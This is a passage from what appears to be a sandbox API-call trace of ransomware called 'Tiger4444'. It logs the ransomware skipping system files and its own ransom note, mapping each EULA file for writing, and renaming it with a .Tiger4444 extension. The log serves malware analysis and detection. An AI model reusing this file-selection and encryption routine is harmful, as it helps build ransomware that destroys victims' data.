hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0044.062] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0044.062] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc760f8 | out: hHeap=0xc50000) returned 1 [0044.062] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13551495975) returned 1 [0044.062] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89d10 | out: hHeap=0xc50000) returned 1 [0044.062] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc721d0 | out: hHeap=0xc50000) returned 1 [0044.062] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0044.064] CloseHandle (hObject=0x2c8) returned 1 [0044.064] CloseHandle (hObject=0x260) returned 1 [0044.068] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ja-jp.htm.Tiger4444") returned 62 [0044.069] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ja-jp.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_ja-jp.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ja-jp.htm.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_ja-jp.htm.tiger4444"), dwFlags=0x1) returned 1 [0044.070] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=210256 | out: Addend=0xc6f980) returned 11994288 [0044.070] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=11 | out: Addend=0xc6f98c) returned 4074 [0044.070] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3f205a, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3f205a, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x9ace3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_ko-kr.htm", cAlternateFileName="EULA_K~1.HTM")) returned 1 [0044.070] lstrcmpiW (lpString1="EULA_ko-kr.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.070] lstrcmpiW (lpString1="EULA_ko-kr.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.070] lstrcmpiW (lpString1="EULA_ko-kr.htm", lpString2="Tiger4444.exe") returned -1 [0044.070] lstrcmpiW (lpString1="EULA_ko-kr.htm", lpString2=".") returned 1 [0044.070] lstrcmpiW (lpString1="EULA_ko-kr.htm", lpString2="..") returned 1 [0044.070] lstrcmpiW (lpString1="EULA_ko-kr.htm", lpString2="windows") returned -1 [0044.070] lstrcmpiW (lpString1="EULA_ko-kr.htm", lpString2="bootmgr") returned 1 [0044.070] lstrcmpiW (lpString1="EULA_ko-kr.htm", lpString2="pagefile.sys") returned -1 [0044.070] lstrcmpiW (lpString1="EULA_ko-kr.htm", lpString2="boot") returned 1 [0044.070] lstrcmpiW (lpString1="EULA_ko-kr.htm", lpString2="ids.txt") returned -1 [0044.070] lstrcmpiW (lpString1="EULA_ko-kr.htm", lpString2="NTUSER.DAT") returned -1 [0044.070] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="EULA_ko-kr.htm" | out: lpString1="EULA_ko-kr.htm") returned="EULA_ko-kr.htm" [0044.070] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ko-kr.htm", dwFileAttributes=0x0) returned 1 [0044.071] lstrlenW (lpString="EULA_ko-kr.htm") returned 14 [0044.071] lstrlenW (lpString="Tiger4444") returned 9 [0044.071] lstrcmpiW (lpString1="ko-kr.htm", lpString2="Tiger4444") returned -1 [0044.071] lstrlenW (lpString=".dll") returned 4 [0044.071] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0044.071] lstrlenW (lpString=".lnk") returned 4 [0044.071] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0044.071] lstrlenW (lpString=".ini") returned 4 [0044.071] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0044.072] lstrlenW (lpString=".sys") returned 4 [0044.072] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0044.072] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ko-kr.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_ko-kr.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0044.072] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0044.072] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13552484107) returned 1 [0044.072] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=634083) returned 1 [0044.072] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc898d8 [0044.072] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71b70 [0044.072] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x9aff0, lpName=0x0) returned 0x2c8 [0044.073] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9aff0) returned 0x2eb0000 [0044.096] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0044.096] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0044.096] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0044.096] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75b80 [0044.096] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0044.097] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b80 | out: hHeap=0xc50000) returned 1 [0044.097] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0044.097] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0044.097] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13554973957) returned 1 [0044.097] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc898d8 | out: hHeap=0xc50000) returned 1 [0044.097] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71b70 | out: hHeap=0xc50000) returned 1 [0044.097] UnmapViewOfFile (lpBaseAddress=0x2eb0000) returned 1 [0044.102] CloseHandle (hObject=0x2c8) returned 1 [0044.102] CloseHandle (hObject=0x260) returned 1 [0044.113] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ko-kr.htm.Tiger4444") returned 62 [0044.114] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ko-kr.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_ko-kr.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ko-kr.htm.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_ko-kr.htm.tiger4444"), dwFlags=0x1) returned 1 [0044.114] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=634096 | out: Addend=0xc6f980) returned 12204544 [0044.114] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=24 | out: Addend=0xc6f98c) returned 4085 [0044.114] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3f33e0, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3f33e0, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x1293b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_lt-lt.htm", cAlternateFileName="EULA_L~1.HTM")) returned 1 [0044.114] lstrcmpiW (lpString1="EULA_lt-lt.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.114] lstrcmpiW (lpString1="EULA_lt-lt.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.114] lstrcmpiW (lpString1="EULA_lt-lt.htm", lpString2="Tiger4444.exe") returned -1 [0044.114] lstrcmpiW (lpString1="EULA_lt-lt.htm", lpString2=".") returned 1 [0044.114] lstrcmpiW (lpString1="EULA_lt-lt.htm", lpString2="..") returned 1 [0044.115] lstrcmpiW (lpString1="EULA_lt-lt.htm", lpString2="windows") returned -1 [0044.115] lstrcmpiW (lpString1="EULA_lt-lt.htm", lpString2="bootmgr") returned 1 [0044.115] lstrcmpiW (lpString1="EULA_lt-lt.htm", lpString2="pagefile.sys") returned -1 [0044.115] lstrcmpiW (lpString1="EULA_lt-lt.htm", lpString2="boot") returned 1 [0044.115] lstrcmpiW (lpString1="EULA_lt-lt.htm", lpString2="ids.txt") returned -1 [0044.115] lstrcmpiW (lpString1="EULA_lt-lt.htm", lpString2="NTUSER.DAT") returned -1 [0044.115] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="EULA_lt-lt.htm" | out: lpString1="EULA_lt-lt.htm") returned="EULA_lt-lt.htm" [0044.115] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_lt-lt.htm", dwFileAttributes=0x0) returned 1 [0044.116] lstrlenW (lpString="EULA_lt-lt.htm") returned 14 [0044.116] lstrlenW (lpString="Tiger4444") returned 9 [0044.116] lstrcmpiW (lpString1="lt-lt.htm", lpString2="Tiger4444") returned -1 [0044.116] lstrlenW (lpString=".dll") returned 4 [0044.116] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0044.116] lstrlenW (lpString=".lnk") returned 4 [0044.116] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0044.116] lstrlenW (lpString=".ini") returned 4 [0044.116] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0044.116] lstrlenW (lpString=".sys") returned 4 [0044.116] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0044.116] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_lt-lt.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_lt-lt.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0044.116] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0044.116] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13556960624) returned 1 [0044.117] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=76091) returned 1 [0044.117] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89608 [0044.117] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc720c0 [0044.117] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x12c40, lpName=0x0) returned 0x2c8 [0044.118] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12c40) returned 0xbe0000 [0044.122] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0044.122] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0044.122] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0044.122] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0044.122] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0044.122] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0044.122] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0044.122] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0044.123] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13557565400) returned 1 [0044.123] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89608 | out: hHeap=0xc50000) returned 1 [0044.123] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc720c0 | out: hHeap=0xc50000) returned 1 [0044.123] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0044.123] CloseHandle (hObject=0x2c8) returned 1 [0044.123] CloseHandle (hObject=0x260) returned 1 [0044.126] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_lt-lt.htm.Tiger4444") returned 62 [0044.126] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_lt-lt.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_lt-lt.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_lt-lt.htm.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_lt-lt.htm.tiger4444"), dwFlags=0x1) returned 1 [0044.130] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=76096 | out: Addend=0xc6f980) returned 12838640 [0044.130] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=6 | out: Addend=0xc6f98c) returned 4109 [0044.130] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3f5af3, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3f5af3, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x147c5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_lv-lv.htm", cAlternateFileName="EULA_L~2.HTM")) returned 1 [0044.130] lstrcmpiW (lpString1="EULA_lv-lv.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.130] lstrcmpiW (lpString1="EULA_lv-lv.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.130] lstrcmpiW (lpString1="EULA_lv-lv.htm", lpString2="Tiger4444.exe") returned -1 [0044.130] lstrcmpiW (lpString1="EULA_lv-lv.htm", lpString2=".") returned 1 [0044.130] lstrcmpiW (lpString1="EULA_lv-lv.htm", lpString2="..") returned 1 [0044.130] lstrcmpiW (lpString1="EULA_lv-lv.htm", lpString2="windows") returned -1 [0044.130] lstrcmpiW (lpString1="EULA_lv-lv.htm", lpString2="bootmgr") returned 1 [0044.130] lstrcmpiW (lpString1="EULA_lv-lv.htm", lpString2="pagefile.sys") returned -1 [0044.130] lstrcmpiW (lpString1="EULA_lv-lv.htm", lpString2="boot") returned 1 [0044.130] lstrcmpiW (lpString1="EULA_lv-lv.htm", lpString2="ids.txt") returned -1 [0044.130] lstrcmpiW (lpString1="EULA_lv-lv.htm", lpString2="NTUSER.DAT") returned -1 [0044.130] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="EULA_lv-lv.htm" | out: lpString1="EULA_lv-lv.htm") returned="EULA_lv-lv.htm" [0044.130] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_lv-lv.htm", dwFileAttributes=0x0) returned 1 [0044.131] lstrlenW (lpString="EULA_lv-lv.htm") returned 14 [0044.131] lstrlenW (lpString="Tiger4444") returned 9 [0044.131] lstrcmpiW (lpString1="lv-lv.htm", lpString2="Tiger4444") returned -1 [0044.131] lstrlenW (lpString=".dll") returned 4 [0044.131] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0044.131] lstrlenW (lpString=".lnk") returned 4 [0044.131] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0044.131] lstrlenW (lpString=".ini") returned 4 [0044.131] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0044.131] lstrlenW (lpString=".sys") returned 4 [0044.131] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0044.131] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_lv-lv.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_lv-lv.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0044.131] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0044.131] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13558451732) returned 1 [0044.131] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=83909) returned 1 [0044.132] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89680 [0044.132] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71400 [0044.132] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x14ad0, lpName=0x0) returned 0x2c8 [0044.133] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14ad0) returned 0xbe0000 [0044.137] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0044.137] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc760f8 [0044.137] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0044.137] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0044.137] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0044.138] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0044.138] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0044.138] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc760f8 | out: hHeap=0xc50000) returned 1 [0044.138] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13559087327) returned 1 [0044.138] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89680 | out: hHeap=0xc50000) returned 1 [0044.138] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71400 | out: hHeap=0xc50000) returned 1 [0044.138] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0044.139] CloseHandle (hObject=0x2c8) returned 1 [0044.139] CloseHandle (hObject=0x260) returned 1 [0044.141] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_lv-lv.htm.Tiger4444") returned 62 [0044.141] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_lv-lv.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_lv-lv.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_lv-lv.htm.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_lv-lv.htm.tiger4444"), dwFlags=0x1) returned 1 [0044.142] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=83920 | out: Addend=0xc6f980) returned 12914736 [0044.142] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=6 | out: Addend=0xc6f98c) returned 4115 [0044.142] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3fa921, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3fa921, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x10674, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_nb-no.htm", cAlternateFileName="EULA_N~1.HTM")) returned 1 [0044.142] lstrcmpiW (lpString1="EULA_nb-no.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.142] lstrcmpiW (lpString1="EULA_nb-no.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.142] lstrcmpiW (lpString1="EULA_nb-no.htm", lpString2="Tiger4444.exe") returned -1 [0044.142] lstrcmpiW (lpString1="EULA_nb-no.htm", lpString2=".") returned 1 [0044.142] lstrcmpiW (lpString1="EULA_nb-no.htm", lpString2="..") returned 1 [0044.142] lstrcmpiW (lpString1="EULA_nb-no.htm", lpString2="windows") returned -1 [0044.142] lstrcmpiW (lpString1="EULA_nb-no.htm", lpString2="bootmgr") returned 1 [0044.142] lstrcmpiW (lpString1="EULA_nb-no.htm", lpString2="pagefile.sys") returned -1 [0044.142] lstrcmpiW (lpString1="EULA_nb-no.htm", lpString2="boot") returned 1 [0044.142] lstrcmpiW (lpString1="EULA_nb-no.htm", lpString2="ids.txt") returned -1 [0044.142] lstrcmpiW (lpString1="EULA_nb-no.htm", lpString2="NTUSER.DAT") returned -1 [0044.142] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="EULA_nb-no.htm" | out: lpString1="EULA_nb-no.htm") returned="EULA_nb-no.htm" [0044.142] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_nb-no.htm", dwFileAttributes=0x0) returned 1 [0044.143] lstrlenW (lpString="EULA_nb-no.htm") returned 14 [0044.143] lstrlenW (lpString="Tiger4444") returned 9 [0044.143] lstrcmpiW (lpString1="nb-no.htm", lpString2="Tiger4444") returned -1 [0044.143] lstrlenW (lpString=".dll") returned 4 [0044.143] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0044.143] lstrlenW (lpString=".lnk") returned 4 [0044.143] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0044.143] lstrlenW (lpString=".ini") returned 4 [0044.143] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0044.143] lstrlenW (lpString=".sys") returned 4 [0044.143] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0044.143] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_nb-no.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_nb-no.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0044.143] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0044.143] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13559633560) returned 1 [0044.143] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=67188) returned 1 [0044.143] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89770 [0044.143] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71fb0 [0044.143] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10980, lpName=0x0) returned 0x2c8 [0044.144] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10980) returned 0xbe0000 [0044.148] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0044.148] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0044.148] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0044.148] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0044.148] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0044.148] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0044.148] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0044.148] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0044.148] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13560127968) returned 1 [0044.148] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89770 | out: hHeap=0xc50000) returned 1 [0044.148] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71fb0 | out: hHeap=0xc50000) returned 1 [0044.148] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0044.149] CloseHandle (hObject=0x2c8) returned 1 [0044.149] CloseHandle (hObject=0x260) returned 1 [0044.151] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_nb-no.htm.Tiger4444") returned 62 [0044.151] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_nb-no.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_nb-no.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_nb-no.htm.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_nb-no.htm.tiger4444"), dwFlags=0x1) returned 1 [0044.152] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=67200 | out: Addend=0xc6f980) returned 12998656 [0044.152] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=4 | out: Addend=0xc6f98c) returned 4121 [0044.152] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3fe3b1, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3fe3b1, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x10698, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_nl-nl.htm", cAlternateFileName="EULA_N~2.HTM")) returned 1 [0044.152] lstrcmpiW (lpString1="EULA_nl-nl.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.152] lstrcmpiW (lpString1="EULA_nl-nl.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.152] lstrcmpiW (lpString1="EULA_nl-nl.htm", lpString2="Tiger4444.exe") returned -1 [0044.152] lstrcmpiW (lpString1="EULA_nl-nl.htm", lpString2=".") returned 1 [0044.152] lstrcmpiW (lpString1="EULA_nl-nl.htm", lpString2="..") returned 1 [0044.152] lstrcmpiW (lpString1="EULA_nl-nl.htm", lpString2="windows") returned -1 [0044.152] lstrcmpiW (lpString1="EULA_nl-nl.htm", 